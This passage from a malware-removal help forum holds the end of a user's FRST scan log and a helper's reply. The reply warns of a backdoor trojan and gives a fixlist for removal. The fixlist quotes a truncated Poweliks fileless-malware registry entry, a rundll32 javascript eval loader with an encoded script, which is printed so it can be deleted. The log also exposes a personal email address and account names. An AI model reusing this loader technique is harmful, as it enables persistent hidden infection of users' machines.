CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\JWT\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\FileSyncApi64.dll (Microsoft Corporation)
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-05-21 10:26 - 2014-09-28 14:10 - 00002708 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {1A7849E6-1F16-423E-A83F-FDAF7FAFD6A8} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {1BAF563C-811E-46A7-B225-D6FDFACB1AD2} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2014-12-10] (Microsoft Corporation)
Task: {2B85D673-6E3D-46EC-B8DC-4F083D2B2384} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {2E663FD9-BBE3-43AE-B4EA-80845CDE5B5B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-12-12] (Piriform Ltd)
Task: {48EFA195-E29A-4C0F-ABB7-3DEEF98C0040} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {56397E68-21A8-4A4E-A059-2B350F9FCF72} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {563CD9A0-E107-4E7A-AC3D-E9104587679A} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {63E580CD-D39D-44CC-9FB5-B0C6F41D9681} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-08-16] (ASUSTeK Computer Inc.)
Task: {669C6352-CD26-40AE-B1C2-723987C6699B} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)
Task: {7359E772-DFCD-48B1-8F95-582AB5925168} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-3865632982-2122395147-3624827403-1002 => %localappdata%\Microsoft\SkyDrive\SkyDrive.exe
Task: {75063612-030A-4823-80D7-1A799C9BB591} - System32\Tasks\{11B805FB-1383-4263-8238-854558AFCD9B} => pcalua.exe -a "C:\Program Files (x86)\PlusVid\Uninstall.exe" -c /fcp=1
Task: {83598673-FABA-4D31-BF87-BF6D514D0988} - System32\Tasks\ASUS P4G => C:\Program Files\ASUS\P4G\BatteryLife.exe [2013-07-23] (ASUS)
Task: {83BCC0BF-274F-4B91-8965-0A028DE99864} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002Core => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe [2014-11-22] (Google Inc.)
Task: {A446CF32-1ED1-4479-93DE-F8B7350A5717} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-31] (Google Inc.)
Task: {AD24A6FB-93AE-4FC3-AA8B-A988EC3E9A49} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-10] (Adobe Systems Incorporated)
Task: {C01C32AD-ACAC-4549-BD14-DAF9C157C26D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-31] (Google Inc.)
Task: {C5224BF3-DC4D-4A54-9498-BC10594FD459} - System32\Tasks\ASUS InstantOn Config => C:\Program Files\ASUS\P4G\InsOnCfg.exe
Task: {CEF619D7-02AF-4962-8A79-76C665090150} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wisdomslife@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {E7323537-7F16-4BAD-A0B0-B3705E371B6D} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-08-19] (ASUS)
Task: {F0916215-DF42-48EC-880B-9F65ABE63972} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-07-09] ()
Task: {F10B768D-D614-45A2-82B1-26815042B104} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2012-09-18] (ASUSTek Computer Inc.)
Task: {FF033E98-65C4-4CB0-AF1B-B1BC015E3885} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002UA => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe [2014-11-22] (Google Inc.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002Core.job => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002UA.job => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-12-19 00:10 - 2012-12-19 00:10 - 00072192 _____ () C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe
2014-03-03 17:44 - 2014-11-03 16:02 - 00116880 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-07-23 11:54 - 2013-07-23 11:54 - 00031360 _____ () C:\Program Files\ASUS\P4G\DevMng.dll
2013-12-03 20:21 - 2013-05-15 16:39 - 00463872 _____ () C:\Program Files (x86)\ASUS Gaming Mouse\hid.exe
2014-01-20 15:17 - 2014-01-20 15:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-12-03 20:10 - 2013-06-23 22:05 - 01199576 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2013-08-19 19:16 - 2013-08-19 19:16 - 00015440 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2013-08-16 12:03 - 2013-08-16 12:03 - 00023040 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd
AlternateDataStreams: C:\ProgramData\Microsoft:KhbmwaIj8jjBmPZ6ss5k5mUEsp
AlternateDataStreams: C:\ProgramData\Microsoft:zMy0bnceFNXIi7v4KfGcGQ
AlternateDataStreams: C:\ProgramData\Microsoft:ZWJJvkiCrYrhz0W4UN6LZ
AlternateDataStreams: C:\Users\JWT\Local Settings:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\Local Settings:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\SkyDrive:ms-properties
AlternateDataStreams: C:\Users\JWT\AppData\Local:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:SiOn268klR3MGhq2LXhtpM2gjnMPs
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:N9I8vNxKZhojc6M3zXLVp3
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:YeOaihpQEHsyBGdECvXiSS
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\86787522.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\86787522.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp.sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\StartupFolder: => "Killer Network Manager.lnk"
HKLM\...\StartupApproved\Run: => "UMonit64"
HKLM\...\StartupApproved\Run32: => "BDRegion"
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3865632982-2122395147-3624827403-500 - Administrator - Disabled)
D3E6B04356AF4AB5B1E5 (S-1-5-21-3865632982-2122395147-3624827403-1007 - Limited - Enabled)
Guest (S-1-5-21-3865632982-2122395147-3624827403-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3865632982-2122395147-3624827403-1009 - Limited - Enabled)
JWT (S-1-5-21-3865632982-2122395147-3624827403-1002 - Administrator - Enabled) => C:\Users\JWT
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (12/30/2014 07:20:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x521589ee
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x2b68
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:19:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158cae
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x144c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:19:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x521587cf
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x488
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:18:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158ba4
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000005
Fault offset: 0x00051156
Faulting process id: 0xb7c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158b32
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x2224
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52157bbc
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1a04
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x54530124
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1b64
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158cae
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1cc0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x54530124
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1e94
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158bce
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x20f4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
 
System errors:
=============
Error: (12/30/2014 07:22:04 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:21:32 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:20:56 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:18:50 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:18:19 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:17:49 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:17:18 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 01:08:10 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 01:07:39 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 01:06:36 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Superfetch service terminated with the following error: 
%%1062
 
 
Microsoft Office Sessions:
=========================
Error: (12/30/2014 07:20:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17416521589eentdll.dll6.3.9600.1727853eeb4a3c0000374000debd82b6801d024335a4a23e6C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll98f8a60e-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:19:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158caentdll.dll6.3.9600.1727853eeb4a3c0000374000debd8144c01d0243332679fa5C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll70a8306c-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:19:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17416521587cfntdll.dll6.3.9600.1727853eeb4a3c0000374000debd848801d024332c2b4d51C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll6cbd1a8f-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:18:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158ba4ntdll.dll6.3.9600.1727853eeb4a3c000000500051156b7c01d02433051d9d79C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll4724cbe8-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158b32ntdll.dll6.3.9600.1727853eeb4a3c0000374000debd8222401d02433068899d0C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll44aec1de-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652157bbcntdll.dll6.3.9600.1727853eeb4a3c0000374000debd81a0401d02433068ae419C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll449d5935-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741654530124ntdll.dll6.3.9600.1727853eeb4a3c0000374000debd81b6401d02433068eb55aC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll44905e8c-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158caentdll.dll6.3.9600.1727853eeb4a3c0000374000debd81cc001d024330682a53fC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll448d50ba-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741654530124ntdll.dll6.3.9600.1727853eeb4a3c0000374000debd81e9401d0243305e615c5C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll43eb85d0-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158bcentdll.dll6.3.9600.1727853eeb4a3c0000374000debd820f401d0243305e1cf3fC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll43df4e91-9026-11e4-bf99-3423875a5d7d
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-12-29 22:15:36.920
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-29 22:15:36.769
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-29 22:08:07.194
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-29 22:08:07.062
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:45:12.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:45:12.402
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:58.781
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:58.378
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:57.651
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:57.267
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 18%
Total physical RAM: 24525.5 MB
Available physical RAM: 19985.72 MB
Total Pagefile: 49101.5 MB
Available Pagefile: 42302.05 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:95.39 GB) (Free:0.22 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (STORAGE) (Fixed) (Total:465.75 GB) (Free:80.14 GB) NTFS
Drive e: (PRODUCTION FILES) (Fixed) (Total:465.76 GB) (Free:156.34 GB) NTFS
Drive f: (TECHNICAL) (Fixed) (Total:121.98 GB) (Free:97.76 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 47F72510)
 
Partition: GPT Partition Type.
 
========================================================
Disk: 1 (Size: 238.5 GB) (Disk ID: 5B98F280)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#9 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 30 December 2014 - 03:25 PM

Hi WTTT3,
 
I must give you this warning:
 
Looking through your logs, one or more of your infections has been identified as a Backdoor Trojan. These threats have backdoor functionality which allows hackers to remotely control your computer, steal critical system information, and download and execute files.
 
I highly suggest that you disconnect this PC from the Internet immediately, and if possible use a clean computer and a flash drive to transfer the programs I request for you to run. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. It would be wise to contact those same financial institutions to notify them of your situation.
 
Due to the nature of this trojan, your computer is very likely to be compromised. There is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:
 
How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 
We can still clean this machine, but I can't guarantee that it will be 100% secure afterwards. If you decide to continue cleaning this machine, follow on with the rest of the steps posted below. If you do not want to clean this machine, please let me know.
 
--------------

We need to run a fix with FRST:

  • Press the Windows key + R on your keyboard at the same time. Type in notepad and press Enter.
  • Copy and paste the script below in the notepad document:
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
U3 swmidi; No ImagePath
AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd
AlternateDataStreams: C:\ProgramData\Microsoft:KhbmwaIj8jjBmPZ6ss5k5mUEsp
AlternateDataStreams: C:\ProgramData\Microsoft:zMy0bnceFNXIi7v4KfGcGQ
AlternateDataStreams: C:\ProgramData\Microsoft:ZWJJvkiCrYrhz0W4UN6LZ
